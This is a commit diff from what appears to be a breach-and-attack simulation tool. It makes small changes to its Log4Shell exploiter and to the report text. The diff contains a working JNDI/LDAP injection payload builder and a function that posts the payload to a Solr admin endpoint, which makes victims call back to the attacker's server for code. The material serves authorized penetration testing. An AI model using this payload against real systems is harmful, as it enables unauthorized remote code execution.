Agent, Island: Minor changes to Log4Shell

Return types, removing logging from solr service
and change Log4j to Log4Shell in Island reporting

monkey/infection_monkey/exploit/log4shell.py

@@ -116,12 +116,12 @@ class Log4ShellExploiter(WebRCE):
 
         self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
 
-    def _build_ldap_payload(self):
+    def _build_ldap_payload(self) -> str:
         interface_ip = get_interface_to_target(self.host.ip_addr)
         return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
 
     # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
-    def _build_command(self, path, http_path):
+    def _build_command(self, path, http_path) -> str:
         # Build command to execute
         monkey_cmd = build_monkey_commandline(
             self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path

monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py

@@ -15,8 +15,6 @@ class SolrExploit(IServiceExploiter):
     def trigger_exploit(payload: str, host: VictimHost, port: int):
         url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
         try:
-            logger.debug("Sending malicious SOLR log4j request")
             requests.post(url, timeout=5, verify=False)  # noqa DUO123
-            logger.debug("Request sent")
         except requests.ReadTimeout as e:
             logger.debug(f"Log4shell request failed {e}")

monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py

@@ -55,7 +55,7 @@ class ExploiterDescriptorEnum(Enum):
     POWERSHELL = ExploiterDescriptor(
         "PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor
     )
-    LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4j Exploiter", Log4ShellProcessor)
+    LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4Shell Exploiter", Log4ShellProcessor)
 
     @staticmethod
     def get_by_class_name(class_name: str) -> ExploiterDescriptor:

monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Log4ShellIssue.js

@@ -2,19 +2,19 @@ import React from 'react';
 import CollapsibleWellComponent from '../CollapsibleWell';
 
 export function log4shellIssueOverview() {
-  return (<li>Some servers are vulnerable to log4shell remote code execution exploit.</li>)
+  return (<li>Some servers are vulnerable to the Log4Shell remote code execution exploit.</li>)
 }
 
 export function log4shellIssueReport(issue) {
   return (
       <>
-        Upgrade the log4j component to version 2.15.0 or later.
+        Upgrade the Apache Log4j component to version 2.15.0 or later.
         <CollapsibleWellComponent>
           The {issue.service} server <span className="badge badge-primary">{issue.machine}</span> (<span
           className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}:{issue.port}</span>) is vulnerable to <span
-          className="badge badge-danger">log4shell remote code execution</span> attack.
+          className="badge badge-danger">the Log4Shell remote code execution</span> attack.
           <br/>
-          The attack was made possible due to an old version of log4j component.
+          The attack was made possible due to an old version of Apache Log4j component.
         </CollapsibleWellComponent>
       </>
     );